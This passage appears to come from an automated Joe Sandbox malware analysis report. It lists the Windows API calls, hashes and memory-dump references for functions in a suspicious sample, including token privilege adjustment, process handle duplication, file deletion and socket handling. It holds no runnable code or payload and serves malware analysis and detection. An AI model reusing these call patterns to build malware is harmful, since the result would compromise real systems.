                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$gethostnamewsprintf
                                                                    • String ID: H$o$s$t
                                                                    • API String ID: 589013843-2997942591
                                                                    • Opcode ID: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction ID: 92fdbd7fed3dffd60e53f6a2c6440f77573962f1768d4b625b8599ba06d74dce
                                                                    • Opcode Fuzzy Hash: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction Fuzzy Hash: 1EF0F62180428CBAEB029B54CC04EEF7F79DB42694F0440A8F80066141D3795614C7B6
                                                                    Function 10007B22 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,75921760,75A78400,10009673,?,?,?), ref: 10007B2B
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 10007B3D
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10007B5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                                    • API String ID: 145871493-1263206204
                                                                    • Opcode ID: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction ID: c04653ab4968678f864b0174d2dc83fc2ab912d403c086209aa955114e2d99bb
                                                                    • Opcode Fuzzy Hash: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction Fuzzy Hash: 04E09232100621A6E6229B65BC48E9B7FB4EFC1AD1B018018FA45A6114D739C845C6A2
                                                                    Function 1000A347 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: fclosefopenfprintf
                                                                    • String ID: %s$C:\2.txt
                                                                    • API String ID: 167258513-4237254449
                                                                    • Opcode ID: 41ea3f754f816433651150daba981647f00d6c72f804a91c61443fda2dd50815
                                                                    • Instruction ID: 2b131c061d7e3b177375d62e6b9ba3b51481e7bc0515796d0beacfd8a309904a
                                                                    • Opcode Fuzzy Hash: 41ea3f754f816433651150daba981647f00d6c72f804a91c61443fda2dd50815
                                                                    • Instruction Fuzzy Hash: 69D012368095326BA651B7E97C08CC73E54DF0B2F57024665F710B51AADB30859246D1
                                                                    Function 004109B7 Relevance: 7.6, APIs: 5, Instructions: 80fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 004109ED
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00410A06
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00410A0E
                                                                    • WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 00410A84
                                                                    • CloseHandle.KERNEL32(?), ref: 00410A95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                    • String ID:
                                                                    • API String ID: 1886887421-0
                                                                    • Opcode ID: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction ID: 39dba3b7ce34f3bf209352e9e1a2eaad2d461a449b25026f79dd16f7dc3d93d4
                                                                    • Opcode Fuzzy Hash: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction Fuzzy Hash: 7B21A475900218FBEB119FA8CCC4AEEBB79EF45784F10816AFB0566281D7744E868B58
                                                                    Function 0041058E Relevance: 7.6, APIs: 5, Instructions: 71stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0041059C
                                                                    • malloc.MSVCRT ref: 004105AE
                                                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 004105BB
                                                                    • strrchr.MSVCRT ref: 004105C3
                                                                    • wsprintfA.USER32 ref: 004105F6
                                                                      • Part of subcall function 00412479: GetFileAttributesA.KERNEL32(00000001,0040DB7C,00000001), ref: 0041247D
                                                                      • Part of subcall function 00412479: GetLastError.KERNEL32 ref: 00412488
                                                                      • Part of subcall function 004103FC: memset.MSVCRT ref: 0041041B
                                                                      • Part of subcall function 004103FC: strrchr.MSVCRT ref: 00410425
                                                                      • Part of subcall function 004103FC: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 00410446
                                                                      • Part of subcall function 004103FC: memset.MSVCRT ref: 00410480
                                                                      • Part of subcall function 004103FC: wsprintfA.USER32 ref: 00410498
                                                                      • Part of subcall function 004103FC: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 004104B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Openmemsetstrrchrwsprintf$AttributesErrorFileLastmallocmemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 2582628008-0
                                                                    • Opcode ID: ec38fed40bc9abba7115ecd7242f6639c22469a6be9d5e5c0d9e3b78c3b36217
                                                                    • Instruction ID: 33f8f4262918b45b5eb9ab49494563c6aff08f9c386b3316b5790c0d6372acfd
                                                                    • Opcode Fuzzy Hash: ec38fed40bc9abba7115ecd7242f6639c22469a6be9d5e5c0d9e3b78c3b36217
                                                                    • Instruction Fuzzy Hash: E311E7735403283AEB2097A59C8DFEB7B6CDF44364F140067F604E5092EAF89AD586E8
                                                                    Function 0040EFB3 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040EFEF
                                                                    • free.MSVCRT ref: 0040EFFE
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F014
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F01C
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,0040CF2E,?), ref: 0040F023
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                    • String ID:
                                                                    • API String ID: 831075735-0
                                                                    • Opcode ID: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction ID: c08ed7c95415b138b5e32dd537fda86e062b1dc33fc70697a18b5dcb61060c27
                                                                    • Opcode Fuzzy Hash: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction Fuzzy Hash: F0010572500712AFD7308FA9CCC8C57B7E9FB48365304893EF1AAA2691C778A845CB54
                                                                    Function 10006F67 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FA3
                                                                    • free.MSVCRT ref: 10006FB2
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FC8
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FD0
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,10004EE2,?), ref: 10006FD7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                    • String ID:
                                                                    • API String ID: 831075735-0
                                                                    • Opcode ID: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction ID: 24648aba92ea272d6710cbe388d30b758f61883bd97b9d0bf840f2c4c6516480
                                                                    • Opcode Fuzzy Hash: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction Fuzzy Hash: B30125B25007169FEB209FA8DCC8D67B7EAFB482E5321893DF1AAD3554C730A841CB50
                                                                    Function 00410B45 Relevance: 7.5, APIs: 5, Instructions: 44fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410AA0: GetCurrentProcess.KERNEL32 ref: 00410AA6
                                                                      • Part of subcall function 00410AA0: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00410AB3
                                                                      • Part of subcall function 00410AA0: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00410B10
                                                                      • Part of subcall function 00410AA0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00410B33
                                                                      • Part of subcall function 00410AA0: CloseHandle.KERNEL32(?), ref: 00410B3C
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000004), ref: 00410B57
                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00410B79
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00000003), ref: 00410B8E
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00410B95
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410B9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Handle$CloseCurrentOpenToken$AdjustCreateDuplicateFileLookupPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 3891907324-0
                                                                    • Opcode ID: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction ID: 701e7183e7ade9e35f03d8965f22410fcfadc7dcd00ca8c7b6c10de28c7ac3be
                                                                    • Opcode Fuzzy Hash: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction Fuzzy Hash: 72F06D71640234BAE63017A28C4EFEB3E2CDB87BF4F100215FA0AA21D1DAB45981C5B4
                                                                    Function 10008AF9 Relevance: 7.5, APIs: 5, Instructions: 44fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 10008A54: GetCurrentProcess.KERNEL32 ref: 10008A5A
                                                                      • Part of subcall function 10008A54: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 10008A67
                                                                      • Part of subcall function 10008A54: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10008AC4
                                                                      • Part of subcall function 10008A54: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 10008AE7
                                                                      • Part of subcall function 10008A54: CloseHandle.KERNEL32(?), ref: 10008AF0
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000004), ref: 10008B0B
                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10008B2D
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00000003), ref: 10008B42
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 10008B49
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10008B52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Handle$CloseCurrentOpenToken$AdjustCreateDuplicateFileLookupPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 3891907324-0
                                                                    • Opcode ID: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction ID: b4c17da15a24d41c01ec6af50e3790ace5c6fe3b432938c9e68273d2ce58b678
                                                                    • Opcode Fuzzy Hash: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction Fuzzy Hash: DEF06DB12012347AF62017618C8EF9B3E2CEB47AF1F100610FB0AA21D4DA609A41C6B0
                                                                    Function 100019B4 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationnetworkCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 100019B9
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100019DC
                                                                    • CloseHandle.KERNEL32(?), ref: 100019F8
                                                                    • CloseHandle.KERNEL32(?), ref: 100019FD
                                                                    • WSACleanup.WS2_32 ref: 100019FF
                                                                      • Part of subcall function 10001E14: setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                      • Part of subcall function 10001E14: CancelIo.KERNEL32(?), ref: 10001E42
                                                                      • Part of subcall function 10001E14: InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                      • Part of subcall function 10001E14: closesocket.WS2_32(?), ref: 10001E57
                                                                      • Part of subcall function 10001E14: SetEvent.KERNEL32(?), ref: 10001E60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1476891362-0
                                                                    • Opcode ID: 97bd7c00ed6bbda089dc2b26730579f3f5ed334adb0da9a8da4e7708ecf6716c
                                                                    • Instruction ID: 885c49e20cdd2e8194fed19f6fbb1843c6ac604a4a77298d6a910c3aa6e159d0
                                                                    • Opcode Fuzzy Hash: 97bd7c00ed6bbda089dc2b26730579f3f5ed334adb0da9a8da4e7708ecf6716c
                                                                    • Instruction Fuzzy Hash: A601AD344117A4DFE725DB64C915BDEBBF4EF017A0F10064DE0A2126EACBB07A05CB61
                                                                    Function 0040E976 Relevance: 7.5, APIs: 5, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E9AF
                                                                    • _mbscat.MSVCRT ref: 0040E9C1
                                                                    • _mbscat.MSVCRT ref: 0040E9D2
                                                                    • _mbscat.MSVCRT ref: 0040E9E3
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040E9F2
                                                                      • Part of subcall function 0040E88C: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E8C1
                                                                      • Part of subcall function 0040E88C: _mbscat.MSVCRT ref: 0040E8D3
                                                                      • Part of subcall function 0040E88C: _mbscat.MSVCRT ref: 0040E8E4
                                                                      • Part of subcall function 0040E88C: _mbscat.MSVCRT ref: 0040E8F5
                                                                      • Part of subcall function 0040E88C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040E914
                                                                      • Part of subcall function 0040E88C: GetFileSize.KERNEL32(00000000,00000000), ref: 0040E925
                                                                      • Part of subcall function 0040E88C: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040E92E
                                                                      • Part of subcall function 0040E88C: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E940
                                                                      • Part of subcall function 0040E88C: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040E960
                                                                      • Part of subcall function 0040E88C: CloseHandle.KERNEL32(?), ref: 0040E96A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
